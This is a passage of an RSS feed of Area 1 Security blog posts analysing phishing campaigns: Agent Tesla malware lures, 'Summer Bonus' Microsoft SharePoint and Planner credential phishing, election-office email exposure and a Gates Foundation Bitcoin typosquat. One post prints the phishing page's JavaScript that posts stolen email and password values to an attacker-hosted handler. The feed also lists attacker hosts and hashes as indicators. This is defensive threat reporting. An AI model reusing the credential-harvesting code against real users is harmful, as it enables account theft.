    <p>If you think your device may have been compromised by malware, it’s imperative to run a full scan of your system to check for signs of infection. It’s also vital to keep your software and OS secure by installing the latest updates on a routine basis in order to reduce exposure to this “Face Mask Supplier” phishing campaign.</p><p><b>It is not enough to rely on email gateways, cloud email suites and traditional AV to protect against these types of attacks, as the threat actor is continually evolving and finding new ways to leverage commodity malware like Agent Tesla.</b></p><p>As attackers often rely on the end user to download and install malicious executables, it is also vital that employees are aware of common tactics an attacker may use to trick targets into opening malicious files. Unsolicited emails from unknown companies should be regarded as guilty until proven otherwise and reported to the security team. Additionally, any attachments containing compressed files should be handled with extreme caution, and any executable files should not be opened. These extra verifications are just a small precaution but go a long way toward ensuring the safety and security of your organization.</p><p>With each wave of the campaign, the malicious files and attacker infrastructure are altered to evade detection. Fortunately, Area 1 Security’s comprehensive protection detects and blocks Agent Tesla-based phishing attacks and other targeted campaigns before they can cause any damage.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p>Attachment: Supplier-Face Mask Forehead Thermometer.pdf.gz:</p><p>MD5: fdfaaf9efb8507262ee9b97324bbb69a</p><p>SHA1: 846da85a2f2e6e79ebc7ed84b00ed97af513c80f</p><p>SHA256: b419849ce915ede72fda1ea0b566651e233ef5eaffbf8b9211bd44085407ad5e</p><p>Executable: Supplier-Face Mask Forehead Thermometer.pdf.exe</p><p>MD5: 64bc654373549584f7e596de24e1d8cc</p><p>SHA1: 6a39bd3ddaa2c9846e2a4912a80fd718eaee622f</p><p>SHA256: 53445247552485c277400bafba84458670f0c1001c91b4f0bcc15935c12d662b </p><p>Command and Control Server:</p><p>us2[.]smtp[.]mailhostbox[.]com</p><p>Sender IP Addresses:</p><p>209[.]58[.]149[.]65</p><p>203[.]188[.]252[.]14</p><p>185[.]66[.]40[.]36</p><p>50[.]28[.]40[.]153</p><p>62[.]210[.]83[.]136</p><p>72[.]32[.]232[.]136</p><p>95[.]216[.]16[.]146</p><p>209[.]58[.]149[.]66</p><p>89[.]33[.]246[.]113</p><p>178[.]239[.]161[.]164</p><p>156[.]96[.]47[.]65</p><p>209[.]58[.]149[.]69</p><p>95[.]211[.]208[.]50</p><p>209[.]58[.]149[.]87</p><p>37[.]48[.]85[.]232</p><p>208[.]91[.]199[.]224</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">2013plj8N4MmDupwNzOjAi</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[July bonus Microsoft spear phishing]]></title>
            <link>https://blog.cloudflare.com/july-bonus-microsoft-spear-phishing/</link>
            <pubDate>Mon, 17 Aug 2020 12:43:00 GMT</pubDate>
            <description><![CDATA[ The creators of two Microsoft phishing campaigns, that Area 1 has dubbed “Summer Bonus”, are attempting to lure unsuspecting employees into divulging their Microsoft credentials. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in August 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Isn’t it great that some companies are <a href="https://www.msn.com/en-us/money/companies/these-30-companies-are-giving-bonuses-and-raises-to-their-essential-workers/ss-BB179W66?li=BBnb7Kz">giving out bonuses</a> to their front-line workers amidst the pandemic? That’s precisely what the creators of two new Microsoft phishing campaigns, that Area 1 has dubbed “Summer Bonus”, are using to lure unsuspecting employees into divulging their Microsoft credentials. Few companies are doing well enough to give out bonuses these days, making an unexpected notification from your employer on a paycheck increase all the more enticing. Area 1 Security suspects that this attack is inspired by all the media buzz around unprecedented bonuses to essential workers. No good deed goes unpunished.</p>
    <div>
      <h3>Microsoft SharePoint Phishing</h3>
      <a href="#microsoft-sharepoint-phishing">
        
      </a>
    </div>
    <p>Microsoft SharePoint Phishing schemes have increasingly plagued companies using the Microsoft Office 365 Suite in recent years. In the spear phishing example below, even a diligent user versed in online safety measures could be fooled by this highly convincing phishing attempt. The attack leverages sophisticated social engineering techniques and a flaw in how legacy email solutions detect malicious messages.</p><p>Targeted victims receive an email similar to the one below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6J93NgwSIi1hCq5Iq05VOd/f04d7a9b87707add1bed71b5b9f9baaa/image1-13.png" />
            
            </figure><p>The email is crafted well enough to pass for a legitimate file share request that most employees wouldn’t think twice about clicking. (Who would pass up a bonus, especially in the COVID-era?) The FROM address is spoofed to look like it’s coming from an automated service within the targeted company, i.e. noreply@&lt;company.com&gt;. A careful analysis of the email headers indicates the first Mail Transfer Agent is a Russian-based server farm hosted at mgn-host[.]ru, which is where the bulk of the emails originated before August 1st.</p><p>Unsurprisingly, a WHOIS lookup of this sender domain, as shown below, reveals little useful information about the registrant.</p>
            <pre><code>% IANA WHOIS server
% for more information on IANA, visit http://www.iana.org
% This query returned 1 object
refer:        whois.tcinet.ru
domain:       RU

organisation: Coordination Center for TLD RU
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation

contact:      administrative
name:         .RU domain Administrative group
organisation: Coordination Center for TLD RU
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation
phone:        +7 495 730 29 71
fax-no:       +7 495 730 29 68
e-mail:       ru-adm@cctld.ru

contact:      technical
name:         Technical Center of Internet
organisation: Technical Center of Internet
address:      8 Marta street 1, bld 12
address:      Moscow  127083
address:      Russian Federation
phone:        +7 495 730 29 69
fax-no:       +7 495 730 29 68
e-mail:       ru-tech@tcinet.ru

nserver:      A.DNS.RIPN.NET 193.232.128.6 2001:678:17:0:193:232:128:6
nserver:      B.DNS.RIPN.NET 194.85.252.62 2001:678:16:0:194:85:252:62
nserver:      D.DNS.RIPN.NET 194.190.124.17 2001:678:18:0:194:190:124:17
nserver:      E.DNS.RIPN.NET 193.232.142.17 2001:678:15:0:193:232:142:17
nserver:      F.DNS.RIPN.NET 193.232.156.17 2001:678:14:0:193:232:156:17
ds-rdata:     32215 8 2 803E2ADED022F18F59CBD68A39812BC2D224D2A68E6D701BEDF62B7E4CD92233

whois:        whois.tcinet.ru

status:       ACTIVE
remarks:      Registration information: http://www.cctld.ru/en

created:      1994-04-07
changed:      2020-07-09
source:       IANA

# whois.tcinet.ru

% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain:        MGN-HOST[.]RU
nserver:       ns1.mgnhost.com.
nserver:       ns2.mgnhost.com.
nserver:       ns3.mgnhost.com.
state:         REGISTERED, DELEGATED, VERIFIED
person:        Private Person
registrar:     REGTIME-RU
admin-contact: https://whois.webnames.ru
created:       2009-09-13T20:00:00Z
paid-till:     2021-09-13T21:00:00Z
free-date:     2021-10-15
source:        TCI</code></pre>
            <p>After August 1st, a new wave of the campaign emerged, divulging a change in the attacker’s tactics. The campaign is now being launched via a virtual private server (VPS), obscuring the attacker’s true origin and making the header seem a bit more innocuous than a glaring .ru address. It’s evident that the attacker is adapting to new detection techniques.</p><p>A large number of Area 1 Security customers were targeted in this ongoing attack, aimed at harvesting user credentials. At first glance, the message seems benign enough. The email displays a Microsoft SharePoint notification tailored to the targeted company and contains the recipient’s email address. Disguised as a simple “Open” button, the link in the message body leads to an AppSpot URL: hxxps://useryxijxui99[.]an[.]r[.]appspot.com/#@.com. Every few days the attacker changes subdomains in an attempt to evade detection.</p><p>Appspot.com is a cloud computing platform for developing and hosting web applications in Google-managed data centers. Despite its legitimate uses, AppSpot is a commonly abused platform, offering attackers a clever way to bypass traditional spam and phish filters. When clicked, this AppSpot link reveals a very convincing Microsoft login portal as shown below.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QSONLnMKwpJLOs9FcyTaQ/9430d1a2ddaaa31d066f05e5d740e08c/image3-10.png" />
            
            </figure><p>The success of these campaigns is a result of the infamous Layer 8 error (user error, <a href="https://www.lifewire.com/have-you-been-the-butt-of-a-tech-joke-2619218">for the non-technicals</a>). Among other techniques, an easy way to spot if a login portal is being spoofed is to simply verify the URL. If the site is a login for Microsoft then the corresponding link should direct your browser to a legitimate Microsoft domain, not appspot.com. The adage “if it seems too good to be true” also rings true for most phishing schemes. It’s always good practice to check with a supervisor before responding to unsolicited requests for credentials or logins, especially as they pertain to company financial matters.</p><p>This campaign peaked on July 31st in a likely attempt to dupe targets into believing this was a legitimate end-of-month bonus. In the days following, the number of emails drastically decreased, with the attacker sending only a small batch of phish every three to four days usually near the end of the business day. Despite the decline in this “Summer Bonus” phish, Area 1 Security believes there could be a resurgence of this attack in the coming months.</p>
    <div>
      <h3>Analysis of HTML Page</h3>
      <a href="#analysis-of-html-page">
        
      </a>
    </div>
    <p>Analyzing the source file of the spoofed login page reveals several interesting methods the attacker is using to circumvent defenses and steal credentials. To give a high-level overview of the process, the login page is hosted on AppSpot and, as such, is issued a valid <a href="https://www.cloudflare.com/application-services/products/ssl/">SSL certificate</a>. To an unsuspecting user, this gives an otherwise malicious site a very trustworthy appearance.</p><p>Benign cloud-based services like AppSpot provide attackers the perfect platform for hosting their malicious content, all the while flying under the radar of legacy vendor email security solutions. The attacker used the HTML/CSS framework of the authentication page for the Microsoft portal but replaced the JavaScript with their own malicious functions.</p><p>In the below code snippet you can see how the attacker is sending victim credentials to the cloud-based site hxxps://701r10010ye[.]azurewebsites[.]net. This additional attacker infrastructure is hosted on yet another commonly abused cloud computing platform, Microsoft Azure. In other words, to better evade detection, the attacker is abusing multiple cloud-based services for not only hosting spoofed login pages but also for obtaining the stolen credentials.</p>
            <pre><code>if($('.pass_section_xyz').length){
var pass = $('#i0118');
	var password_v = pass.val();
	if(yid &amp;&amp; yid != '' &amp;&amp; yid.length &gt; 4 &amp;&amp; password_v != ''){
		//var password_v = login_passwd.val();
			
		/*  */
			$.ajax({
url: 'https://701r10010ye.azurewebsites.net/handler.php', 
type: 'POST', 
dataType: 'html', 
beforeSend: function(){
$('.ldsddddd').show();
},
data: { Email : yid, password : password_v}, 
crossDomain: true,
success: function(msg) {
//alert(msg);
$('.ldsddddd').hide();
	if(msg == 'yes'){
		$('.alert_email_sect').hide();
		window.location.replace("https://portal.office.com");
	}
	else{
		$('.alert_msg_yxq').html("Your account or password is incorrect. If you don't remember your password");
		$('.alert_email_sect').show();
	}</code></pre>
            
    <div>
      <h3>Microsoft Planner Phishing</h3>
      <a href="#microsoft-planner-phishing">
        
      </a>
    </div>
    <p>A derivative of the SharePoint phish detailed above is wreaking havoc on company inboxes. This variant, possibly carried out by the same attackers, again uses the pretext of a “Summer Bonus” — but this time, attempts to spoof a Microsoft Planner email notification.</p><p>This spear phish is another great example of how attackers are skillfully crafting phishing messages to lure their targets. The text, images, and formatting are an almost identical match to the real Microsoft Planner notifications. This demonstrates how even employee cybersecurity training is not enough for a company to effectively mitigate their threat surface.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5dtvUOc5mUtcREXOjXBzeL/fa1428f3a6c1848a044f713c99eb96bf/image2-15.png" />
            
            </figure><p>The most glaring evidence that this is a phishing email can be found in the sender field. The attacker created a display name that makes it appear as if the true sender address was one belonging to the targeted company (i.e., noreply@sharepoint[.]com <b>@&lt;targeted_company.com&gt;</b>). The most scrupulous users might easily dismiss such a sender as benign. However, a closer look at the email headers exposes the true sender address, root@hwsrv-757045[.]hostwindsdns[.]com. Based on the sender domain, the attacker is using a VPS provider to launch their phishing campaign. Threat actors commonly rely on VPS services not only for their scalability and ease of use but also for their ability to obscure the attacker’s true location.</p><p>As with the previous Sharepoint campaign, the detection of this “Microsoft Planner” phish uncovered the continued abuse of cloud computing platforms, this time Amazon Web Services (AWS). The “Open in Microsoft Planner” button in the body of the message links to hxxps://officezbf0kmun0j324qysxn0y98zchskfee[.]s3[.]us-east-2[.]amazonaws.com/index.htm?c=@.com. The AWS bucket associated with this attack was inactive at the time of writing; however, it is highly likely the URL linked to another spoofed Microsoft login portal.</p><p>This ever-evolving “Summer Bonus” campaign is an ongoing threat to many individuals and businesses alike. The use of VPS providers, as well as abuse of multiple cloud services throughout several stages of the attack, make it a particularly difficult campaign to detect. To make matters worse, because the URLs used in the attacks point to legitimate domains and the messages contain no malicious payloads, traditional defenses will continually miss phish like this. In fact, the messages successfully passed through Microsoft’s Office 365 filter despite these red flags.</p><p>Fortunately, Area 1 Security detected this stealthy “Summer Bonus” campaign and stopped these phish from reaching our customers’ inboxes.</p><p>Area 1 Security‘s advanced Machine Learning and Artificial Intelligence technology allow our algorithms to uncover new tactics malicious actors are using to bypass legacy vendors and cloud email providers in real time versus waiting days or weeks for signature updates. Our time-zero detections lead the industry with reliable verdicts that stop phishing attempts at delivery time. This has many advantages over post-delivery retraction in that the user is never exposed to the attack.</p>
    <div>
      <h3>Indicators of Compromise</h3>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    <p>hxxps://useryxijxui99[.]an[.]r[.]appspot[.]com/#@.com</p><p>hxxps://riqri733r[.]ts[.]r[.]appspot[.]com/#@.com</p><p><a href="https://officezbf0kmun0j324qysxn0y98zchskfee\[.\]s3\[.\]us-east-2\[.\]amazonaws\[.\]com/index.htm?c=">https://officezbf0kmun0j324qysxn0y98zchskfee\[.\]s3\[.\]us-east-2\[.\]amazonaws\[.\]com/index.htm?c=</a>@.com</p><p>hxxps://701r10010ye[.]azurewebsites[.]net/handler[.]php</p><p>root@hwsrv-757045[.]hostwindsdns[.]com</p><p>vds62403[.]mgn-host[.]ru</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <guid isPermaLink="false">gIN63kknA7qZzU2J6A587</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[New Area 1 security study shows that U.S. State & local election administrators remain vulnerable to phish]]></title>
            <link>https://blog.cloudflare.com/2020-elections-phishing-report/</link>
            <pubDate>Sun, 26 Jul 2020 12:52:00 GMT</pubDate>
            <description><![CDATA[ With only 100 days until Election Day, Area 1 Security’s new “Phishing Election Administrators” report assesses the depth of current email security controls used by 10,000 U.S. state and local election administrators. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Today, Area 1 Security published the results of “<a href="https://www.cloudflare.com/static/12411304c9c8902d6744dd8a641c6d9b/BDES-3794_CloudflareArea1_Report_PhishingElectionAdministrators_REVSEPT2022.pdf">Phishing Election Administrators</a>,” a comprehensive study analyzing more than 10,000 U.S. state and local election administrators’ email phishing vulnerabilities. With fewer than 100 days left until Election Day, the report reveals that states are still in widely varying stages of cybersecurity readiness.</p><p>Key findings include:</p><ul><li><p>The majority (53.24 percent) of state and local election administrators have only <i>rudimentary or non-standard technologies</i> to protect themselves from phishing;</p></li><li><p>Fewer than 3 out of 10 (28.14 percent) election administrators have <i>basic</i> controls to <a href="https://www.cloudflare.com/learning/email-security/how-to-prevent-phishing/">prevent phishing</a>;</p></li><li><p>Fewer than 2 out of 10 (18.61 percent) election administrators have implemented <i>advanced anti-phishing</i> cybersecurity controls;</p></li><li><p>A surprising 5.42 percent of election administrators rely on <i>personal email accounts</i> or technologies designed for personal email (such as Yahoo!, Hotmail, AOL or others), to conduct their duties; and</p></li><li><p>A number of election administrators independently manage their own custom email infrastructure, including using <a href="https://media.defense.gov/2020/May/28/2002306626/-1/-1/0/CSA%20Sandworm%20Actors%20Exploiting%20Vulnerability%20in%20Exim%20Transfer%20Agent%2020200528.pdf">versions of Exim known to be targeted</a> by cyber actors linked to the Russian military that interfered in prior U.S. elections.</p></li></ul><p>Ninety-five percent of cybersecurity damages worldwide begin with phishing, and phishing campaigns come in all shapes and sizes. The majority of phishing campaigns begin with an <a href="https://www.wsj.com/articles/phishing-the-clintons-1481761502">innocuous and authentic email</a> that individuals are unable to recognize as malicious. Consequently, the quality of email protection used by organizations and individuals has an inordinate bearing on their overall cybersecurity posture.</p><p>“Our elections are vital. They need to be resilient against whatever crisis the moment throws at us — and that requires resources and planning,” said Oren J. Falkowitz, co-founder of Area 1 Security. “However, most state and local election administrators are not very close to ensuring a safe election. This challenge is going to be exacerbated the longer it takes for them to get the resources and expertise needed to make changes.”</p><p><b>Area 1’s email security recommendations for state and local election administrators include:</b></p><ul><li><p><b>Ending use of Exim email servers:</b> Given the government’s guidance to update Exim to mitigate <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-10149">CVE-2019-10149</a> and other vulnerabilities including, but not limited to, <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-15846">CVE-2019-15846</a> and <a href="https://nvd.nist.gov/vuln/detail/CVE-2019-16928">CVE-2019-16928,</a> election administrators are urged to cease use of Exim. Upgrading alone does not mitigate exploitation. Prior Russian cyber activities directed towards U.S. elections make use of Exim ill-advised. For those who must continue running Exim, update to the latest version; running a version prior to 4.93 leaves a system vulnerable to disclosed vulnerabilities. Administrators can update Exim Mail Transfer Agent software through their Linux distribution’s package manager or by downloading the latest version from <a href="https://exim.org/mirrors.html">https://exim.org/mirrors.html</a>.</p></li><li><p><b>Transitioning to cloud email infrastructure:</b> Running custom email infrastructure requires network administrators to be perfect every single day. Instead, Area 1 Security recommends the use of cloud email infrastructure such as Google’s GSuite or Microsoft’s Office 365 in combination with a cloud email security solution.</p></li><li><p><b>Ending use of personal email technologies for election duties:</b> Under no circumstances should election administrators use personal email for the conduct or administration of elections.</p></li></ul><p><i>Area 1 Security is committed to </i><b><i>Responsible Disclosure</i></b><i> guidelines in all situations where it uncovers specific and verifiable campaign activity. As part of our commitment to those guidelines, Area 1 has been engaged with relevant stakeholders that have an interest in understanding this campaign in greater depth.</i></p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Election Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">6yCxGf6NVbSm9RWRKe3Q6x</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
        <item>
            <title><![CDATA[Don’t trust that tweet…or that email from "Bill Gates"]]></title>
            <link>https://blog.cloudflare.com/dont-trust-that-tweet-or-email/</link>
            <pubDate>Mon, 20 Jul 2020 12:55:00 GMT</pubDate>
            <description><![CDATA[ On July 16th, 2020, an email appearing to be from the Bill & Melinda Gates Foundation was sent to numerous recipients, seeking donations for the Foundation in Bitcoin. ]]></description>
            <content:encoded><![CDATA[ <p><i>This blog originally appeared in July 2020 on the Area 1 Security website, and was issued in advance of Cloudflare's acquisition of Area 1 Security on April 1, 2022. </i><a href="/why-we-are-acquiring-area-1/"><i>Learn more</i></a><i>.</i></p><p>Each day, hundreds of thousands of new domains are registered by users around the world. Unfortunately, the simplicity of <a href="https://www.cloudflare.com/products/registrar/">domain registration</a> makes it simple for attackers to register fraudulent domains for use in phishing campaigns. In fact, according to ICANN, nearly 5.45% of newly registered domains per day are malicious (including phishing, botnets, and malware). This means there are 25,070 newly registered malicious domains per day on average.</p><p>On July 16th, 2020, an email appearing to be from the Bill &amp; Melinda Gates Foundation was sent to numerous recipients, seeking donations for the Foundation in Bitcoin. The email enticed potential donors by offering to double any donations received within seven days. The sender domain of the email was strikingly similar to the legitimate foundation’s domain, gatesfoundation.org.</p><p><b>Aside from one letter, the malicious sender domain could easily pass for one belonging to the Gates Foundation.</b> The attacker cleverly employed <a href="https://www.cloudflare.com/learning/dns/what-is-cybersquatting/">typosquatting</a> when creating the domain name, just minutes before sending the email. Without close scrutiny, the domain’s typo is indistinguishable from the legitimate domain. The attacker also set up an SPF record for the domain in order to ensure reliable delivery of their attack. Interestingly, this phish was sent just a day after Bill Gates’ Twitter account was hacked and used to tweet a message nearly identical to this email.</p>
            <pre><code>Benign Domain: gatesfoundation.org
Malicious Domain: gatesfoundatlon[.]com
Malicious Domain Age: 2020-07-16 17:00:54 +0000 UTC
SPF Record:
     gatesfoundatlon[.]com.	1759	IN	TXT	"v=spf1 include:spf.privateemail.com ~all"
Bitcoin address: 18XJzrgPqYhKKeR2j4vz6wPQorK3sNuNxs</code></pre>
            
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4DcmAJSHyYgulPzRRnPhHd/cf396f15cb6ff6500e612166dc146e35/image2-16.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3Jc4dDl2jFFtw9pNOKIAzk/9883877608132754776b62ae2c0faebb/image3.jpg" />
            
            </figure>
    <div>
      <h3>Whois Record for gatesfoundatlon[.]com</h3>
      <a href="#whois-record-for-gatesfoundatlon-com">
        
      </a>
    </div>
    
            <pre><code>Domain name: gatesfoundatlon[.]com
Registry Domain ID: 2546450570_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2020-07-16T17:00:54.00Z
Registrar Registration Expiration Date: 2021-07-16T17:00:54.00Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.6613102107
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: WhoisGuard Protected
Registrant Organization: WhoisGuard, Inc.
Registrant Street: P.O. Box 0823-03411
Registrant City: Panama
Registrant State/Province: Panama
Registrant Postal Code:
Registrant Country: PA
Registrant Phone: +507.8365503
Registrant Phone Ext:
Registrant Fax: +51.17057182
Registrant Fax Ext:
Registrant Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Registry Admin ID:
Admin Name: WhoisGuard Protected
Admin Organization: WhoisGuard, Inc.
Admin Street: P.O. Box 0823-03411
Admin City: Panama
Admin State/Province: Panama
Admin Postal Code:
Admin Country: PA
Admin Phone: +507.8365503
Admin Phone Ext:
Admin Fax: +51.17057182
Admin Fax Ext:
Admin Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Registry Tech ID:
Tech Name: WhoisGuard Protected
Tech Organization: WhoisGuard, Inc.
Tech Street: P.O. Box 0823-03411
Tech City: Panama
Tech State/Province: Panama
Tech Postal Code:
Tech Country: PA
Tech Phone: +507.8365503
Tech Phone Ext:
Tech Fax: +51.17057182
Tech Fax Ext:
Tech Email: 42d8ccf1af2d41378f65f3d302938b5e.protect@whoisguard.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
&gt;&gt;&gt; Last update of WHOIS database: 2020-07-15T23:22:34.80Z &lt;&lt;&lt;</code></pre>
            
    <div>
      <h3>Twitter Message From July 15, 2020:</h3>
      <a href="#twitter-message-from-july-15-2020">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/75JTu1z0KjOComkOIRQQWb/56b1c39969704ca0223a6614592b8761/image1-4.jpg" />
            
            </figure><p>Area 1 uses multiple analysis techniques that leverage insight gained from proactive web crawling and early identification of attacker campaign infrastructure, to detect and stop email from spoofed domains and accounts. Using preemptive threat hunting and a broad set of proprietary analysis techniques, Area 1 identifies phishing campaigns, including malicious newly registered domains, that other defenses miss.</p> ]]></content:encoded>
            <category><![CDATA[Email Security]]></category>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Phishing]]></category>
            <guid isPermaLink="false">1DgLAgnVR6ZKm4hktSGB3q</guid>
            <dc:creator>Elaine Dzuba</dc:creator>
        </item>
    </channel>
</rss>